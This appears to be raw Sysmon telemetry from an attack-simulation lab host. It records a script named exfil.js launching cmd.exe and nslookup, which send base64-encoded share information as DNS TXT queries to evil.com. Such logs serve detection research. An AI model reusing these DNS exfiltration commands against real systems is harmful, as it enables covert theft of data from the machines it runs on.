14:16:37.381{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-17C5-629A-1441-000000005F02}4296C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201959Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.381{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17C5-629A-1441-000000005F02}4296C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201958Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.381{2E1864BB-17C5-629A-1441-000000005F02}42965440C:\Windows\system32\conhost.exe{2E1864BB-17C5-629A-1341-000000005F02}6324C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201957Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.349{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17C5-629A-1441-000000005F02}4296C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000201956Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.349{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17C5-629A-1341-000000005F02}6324C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000201955Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.349{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201954Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.349{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201953Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.349{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201952Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.349{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201951Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.349{2E1864BB-17A1-629A-783D-000000005F02}55527024C:\Windows\System32\WScript.exe{2E1864BB-17C5-629A-1341-000000005F02}6324C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000201950Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.352{2E1864BB-17C5-629A-1341-000000005F02}6324C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBSZW1vdGUgQWRtaW4= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlotrc.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000201949Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.333{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlhkq.tmpMD5=1D1CCA53E4DF780302A6C1C8BFFFFD37,SHA256=3E9BA274CFCD18E7F9C724A3CED552A6AAA905F20D03820BE6FCA23A34DF3C9F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000201948Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.264{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201947Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.264{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201946Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.248{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201945Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.248{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201944Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.248{2E1864BB-17C5-629A-1141-000000005F02}77884344C:\Windows\system32\conhost.exe{2E1864BB-17C5-629A-1241-000000005F02}2736C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201943Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.248{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17C5-629A-1241-000000005F02}2736C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000201942Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.248{2E1864BB-17C5-629A-1041-000000005F02}80327156C:\Windows\system32\cmd.exe{2E1864BB-17C5-629A-1241-000000005F02}2736C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000201941Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.252{2E1864BB-17C5-629A-1241-000000005F02}2736C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiBDOlxXaW5kb3dz evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17C5-629A-1041-000000005F02}8032C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiBDOlxXaW5kb3dz evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlhkq.tmp 2>&1 10341000x8000000000000000201940Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.211{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-17C5-629A-1141-000000005F02}7788C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201939Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.211{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17C5-629A-1141-000000005F02}7788C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201938Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.211{2E1864BB-17C5-629A-1141-000000005F02}77884344C:\Windows\system32\conhost.exe{2E1864BB-17C5-629A-1041-000000005F02}8032C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201937Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.195{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17C5-629A-1141-000000005F02}7788C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000201936Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.179{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201935Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.179{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201934Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.179{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201933Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.179{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201932Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.179{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17C5-629A-1041-000000005F02}8032C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000201931Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.179{2E1864BB-17A1-629A-783D-000000005F02}55527256C:\Windows\System32\WScript.exe{2E1864BB-17C5-629A-1041-000000005F02}8032C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000201930Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.185{2E1864BB-17C5-629A-1041-000000005F02}8032C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiBDOlxXaW5kb3dz evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlhkq.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000201929Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.179{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlbwjb.tmpMD5=DF35AB54482476B9173CEB90AD028262,SHA256=D36A5C0891B34251E0B089204F7A21F9F91A19D06CA659E6438127A003B7EB57,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000201928Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 